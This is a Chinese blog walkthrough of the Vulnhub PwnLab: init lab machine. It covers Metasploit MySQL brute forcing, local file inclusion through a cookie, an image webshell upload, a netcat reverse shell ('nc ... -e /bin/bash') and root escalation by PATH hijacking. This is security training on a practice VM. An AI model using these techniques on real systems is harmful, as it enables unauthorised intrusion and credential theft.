PwnLab: init-文件包含、shell反弹、提权--靶机渗透思路讲解

已于 2024-08-07 18:39:48 修改
阅读量927 收藏 20
点赞数 22
文章标签: web安全
于 2024-08-07 18:33:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xt350488/article/details/140998666
版权

Vulnhub靶机链接回【PwnLab

首页有一个登录框

image-20240807124822770

image-20240807124822770

他没有验证码,我们试试暴力破解

image-20240807122743025

image-20240807122743025

开始爆破了,全部失败,哈哈哈

image-20240807122851001

image-20240807122851001

nmap全端口扫描试试

image-20240807131408315

image-20240807131408315

有mysql服务,再爆破一下数据库,使用msf框架

use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.71.1     //设置目标服务器的ip地址
set rport 3306              //设置目标端口,为MySQL开启的端口号,默认是3306
set username root        //设置用户名,默认即为root
set pass_file /home/kali/pass.txt   //指定密码字典文件的路径
run                     //开始爆破

爆破失败。。。。。。

image-20240807130714714

image-20240807130714714

在url上面有一个page,猜测是文件包含漏洞,我们包含/etc/passwd,没有效果

image-20240807164615966

image-20240807164615966

php filter伪协议试试也不行

image-20240807170053674

image-20240807170053674

这些都试过了,那么直接包含index呢,出来了index的源码,就可以发现它的包含规则不能包含后缀

image-20240807170122370

image-20240807170122370

解码看看,对这个lang的cookie进行文件包含

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
 include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.

御剑目录扫描一下

image-20240807172346507

image-20240807172346507

包含upload,并base64解码,获取源码

<?php
session_start();
if (!isset($_SESSION['user'])) { die('你没有登录.'); }
?>
<html>
 <body>
  <form action='' method='post' enctype='multipart/form-data'>
   <input type='file' name='file' id='file' />
   <input type='submit' name='submit' value='Upload'/>
  </form>
 </body>
</html>
<?php 
if(isset($_POST['submit'])) {
 if ($_FILES['file']['error'] <= 0) {
  $filename  = $_FILES['file']['name'];
  $filetype  = $_FILES['file']['type'];
  $uploaddir = 'upload/';
  $file_ext  = strrchr($filename, '.');
  $imageinfo = getimagesize($_FILES['file']['tmp_name']);
  $whitelist = array(".jpg",".jpeg",".gif",".png"); 

  if (!(in_array($file_ext, $whitelist))) {
   die('Not allowed extension, please upload images only.');
  }

  if(strpos($filetype,'image') === false) {
   die('Error 001');
  }

  if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
   die('Error 002');
  }

  if(substr_count($filetype, '/')>1){
   die('Error 003');
  }

  $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

  if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
   echo "<img src=\"".$uploadfile."\"><br />";
  } else {
   die('Error 4');
  }
 }
}

?>

login源码,我们看到了有一个config.php引用,而且还是在当前目录

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
 $luser = $_POST['user'];
 $lpass = base64_encode($_POST['pass']);

 $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
 $stmt->bind_param('ss', $luser, $lpass);

 $stmt->execute();
 $stmt->store_Result();

 if ($stmt->num_rows == 1)
 {
  $_SESSION['user'] = $luser;
  header('Location: ?page=upload');
 }
 else
 {
  echo "Login failed.";
 }
}
else
{
 ?>
 <form action="" method="POST">
 <label>用户名: </label><input id="user" type="test" name="user"><br />
 <label>密  码: </label><input id="pass" type="password" name="pass"><br />
 <input type="submit" name="submit" value="Login">
 </form>
 <?php
}

config包含

image-20240807170203368

image-20240807170203368

解码,好有了mysql密码

image-20240807134448767

image-20240807134448767

mysql连接

image-20240807134540048

image-20240807134540048

指定好数据库

image-20240807134816919

image-20240807134816919

找到指定表名就能看到用户密码了,密码有==号的话,那么大概率就是base64编码

image-20240807134848062

image-20240807134848062

解码

image-20240807135110924

image-20240807135110924

登录试试

image-20240807135123551

image-20240807135123551

登录成功了,只允许图片上传

image-20240807135555426

image-20240807135555426

我们分析之前找到的文件上传源码,是白名单

<?php
session_start();
if (!isset($_SESSION['user'])) { die('你没有登录.'); }
?>
<html>
 <body>
  <form action='' method='post' enctype='multipart/form-data'>
   <input type='file' name='file' id='file' />
   <input type='submit' name='submit' value='Upload'/>
  </form>
 </body>
</html>
<?php 
if(isset($_POST['submit'])) {
 if ($_FILES['file']['error'] <= 0) {
  $filename  = $_FILES['file']['name'];
  $filetype  = $_FILES['file']['type'];
  $uploaddir = 'upload/';
  $file_ext  = strrchr($filename, '.');
  $imageinfo = getimagesize($_FILES['file']['tmp_name']);
  $whitelist = array(".jpg",".jpeg",".gif",".png"); 

  if (!(in_array($file_ext, $whitelist))) {
   die('Not allowed extension, please upload images only.');
  }

  if(strpos($filetype,'image') === false) {
   die('Error 001');
  }

  if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
   die('Error 002');
  }

  if(substr_count($filetype, '/')>1){
   die('Error 003');
  }

  $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

  if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
   echo "<img src=\"".$uploadfile."\"><br />";
  } else {
   die('Error 4');
  }
 }
}

?>

图片马gif正常上传

image-20240807170244303

image-20240807170244303

我们用dirb扫到一个目录

image-20240807140150950

image-20240807140150950

gif上传成功

image-20240807140200246

image-20240807140200246

伪协议包含不成功

image-20240807170303756

image-20240807170303756

分析index.php源代码,它对cookie的值作为路径,这个参数为lang

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
 include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.

那我们就添加一个cookielang=../upload/66c30a7180c399c3188ff89f1e2c5c02.gif

image-20240807141325596

image-20240807141325596

此时回到首页

image-20240807170320504

image-20240807170320504

蚁剑连接试试

image-20240807141621704

image-20240807141621704

这里不要忘了添加cookie

image-20240807141646389

image-20240807141646389

反弹测试nc,有e参数,可以用nc反弹shell

nc 10.0.0.190 80 -e /bin/bash

image-20240807142125319

image-20240807142125319

反弹成功

image-20240807142325791

image-20240807142325791

终端升级

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

切换root账号,弱口令成功了。。。。

image-20240807144049758

image-20240807144049758

image-20240807144219447

image-20240807144219447

如果不用弱口令,正常情况是这样的,找到数据库中的密码和用户

image-20240807144751018

image-20240807144751018

猜测这个用户能用登录该系统,但是登录成功后,没什么利用价值

image-20240807144818674

image-20240807144818674

切换用户kane,里面有一个msgmike文件,查看它,这有一个命令

image-20240807145131804

image-20240807145131804

查看这个文件没有权限

image-20240807145214205

image-20240807145214205

我们切换这个mike用户,不能登录,鉴权失败,我们也就无法查看这个文件

image-20240807145344318

image-20240807145344318

然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,

则会先从当前目录来寻找cat指令,相当于我们自己创建一个读文件的cat指令,用这个指令来

读新建取/home/mike/msg.txt文件,我们新建一个cat文件,并添加执行权限,依次执行以下命令

image-20240807160433869

image-20240807160433869

这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),

我们就会提升到mike权限:

image-20240807162051127

image-20240807162051127

我们切换这个用户的跟目录发现有个msg2root

查看

image-20240807162730625

image-20240807162730625

发现一个bin/bash会话,不断尝试,直到如下结果; /bin/bash -p才能够以root的权限查看flag.txt

image-20240807164449825

image-20240807164449825

泷羽Sec
关注
  • 22
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
pwnlab-init靶机渗透测试
weixin_49340699的博客
07-14 985
pwnlab-init靶机渗透测试流程 流程 首先信息收集对目标网段进行扫描 netdiscover -i etho -r 192.168.19.0/24 发现目标主机192.168.19.149 用nmap对目标主机端口扫描 nmap -sV 192.168.19.149 开了三个端口 80 111 3306 首先访问80端口 三个页面有上传,登录,和一个啥也没有的home页面上传要求先登录 从登录页面下手 打开登录页面可以看到这个url很敏感 应该是存在文件包含漏洞 先扫一下目录看看有没有发
VulnHub-pwnlab_init渗透
chengshiming520的博客
06-17 936
VulnHub-pwnlab_init渗透
Vulnhub靶机 PWNlab_init
菜浪马废的博客
04-15 1284
找到靶机ip 扫描到端口 发现/config.php LFI 学习链接https://blog.csdn.net/qq_29419013/article/details/81202358 解码 得到了一个数据库账号 登录进去,看见三组账号(登录时加-D,不然不能登录) kent | Sld6WHVCSkpOeQ== JWzXuBJJNy mike | U0lmZHNURW42S...
pwnlab_init靶机
小小猪的博客
06-09 326
pwnlab_init靶机 arp-scan -l 查询靶机ip地址 nmap -sV -Pn -A x.x.x.231 发现开放80,111,3306端口 发现登录界面 查看URL http://x.x.x.231/index.php?page=login 可能存在文件包含漏洞 此文件包含不用填写后缀名http://x.x.x.231/index.php?page=php://filter/convert.base64-encode/resource=config .
OSCP pwnlab_init 靶机渗透
Shadow的博客
04-07 435
pwnlab_init 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-07 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 pwnlab_init主机ip为172.16.1.20 nmap -A -p- 172.16.1.20 我们看到开启了80、3306等端口,登..
vulnhub靶场--pwnlab_init靶场
zzzzzzkeai的博客
12-08 359
vulnhub靶场--pwnlab_init靶场
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
红队打靶练习:PWNLAB: INIT
分享
12-12 726
【代码】红队打靶练习:PWNLAB: INIT。犹如蟒蛇缠绕般的窒息感.......
pwnlab_init
底层社会中的弱智
04-29 1124
找到目标IP 192.168.11.131 扫描端口 开放80端口 apache中间件版本暂无可用exp 3306mysql数据库 111 rdp远程桌面 先扫一下80的目录 看到config.php 然后可能存在注入 使用sqlmap无结果放弃注入 查看URL 可能存在文件包含 http://192.168.11.131/index.php?page=...
18-VulnHub-pwnlab_init
尼德霍格007
08-13 744
18-VulnHub-PwnLab: init 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-12 注意:此次渗透在VMware虚拟机中演示,kali机IP地址为192.168.21.128。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 nmap扫描靶机地址 看到靶机地址是192.168.21.6 扫描靶机
vulnhub渗透日记11:pwnlab_init
ericalezl的博客
07-23 667
⏰时间:2023.7.23🗺️靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
pwnlab_init靶场记录
痴人说梦梦中人
02-03 405
pwnlab_init靶场练习记录
【甄选靶场】Vulnhub百个项目渗透——项目十八:pwnlab_init(LFI本地文件包含,PHP伪协议,文件上传绕过,逆向分析)
人间体佐菲的博客
09-21 1660
网络安全,信息安全渗透测试
2021年2月2日-NO18-Vulnhub-pwnlab_init-渗透学习
AnonyMousIT的博客
02-03 381
2021年2月2日-NO18-Vulnhub-pwnlab_init-渗透学习 一、简介 二、信息收集 扫描端口 可以看到 开放着80,111,3306,49422端口 使用nikto 网站进行扫描 看到 config.php可能含有数据库id和密码 访问web页面 这里可以看出 存在LFI(本地文件包含漏洞) 参考文章 https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ http://192.168.
No.18-VulnHub-PwnLab: init-Walkthrough渗透学习
qq_34801745的博客
01-15 1774
** VulnHub-PwnLab: init-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 靶机难度:中级(CTF) 靶机发布日期:2016年8月1日 靶机描述:Wellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to b...
PwnLab靶场&amp;PHP伪协议&amp;OSCP推荐&amp;代码审计&amp;命令劫持&amp;命令注入
最新发布
2401_83621136的博客
04-03 715
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
__init__和_init_
07-27
__init__和__init__是同一个概念,都是Python中的特殊方法,用于初始化一个类的实例。\[1\]在Python中,每当创建一个类的实例时,都会自动调用该类的__init__方法。__init__方法的第一个参数永远是self,表示创建的实例本身。\[3\]在__init__方法内部,可以将各种属性绑定到self,以便在创建实例时进行初始化操作。\[3\]通过在__init__方法中定义属性,可以确保每个实例都具有相同的属性,并且可以在创建实例时传入与__init__方法匹配的参数进行初始化。\[2\]__init__.py文件是一个特殊的文件,用于将一个目录作为Python包进行导入。\[1\]它可以为空文件,也可以包含一些初始化代码。__init__.py文件的存在告诉Python解释器该目录是一个包,并且可以在该包中导入其他模块。\[1\] #### 引用[.reference_title] - *1* *2* [__init__文件和__init__函数](https://blog.csdn.net/dingding_12345/article/details/70196528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Python中__init__和__init__.py的作用](https://blog.csdn.net/mch2869253130/article/details/88864962)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泷羽Sec

公众号【小羽网安】

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值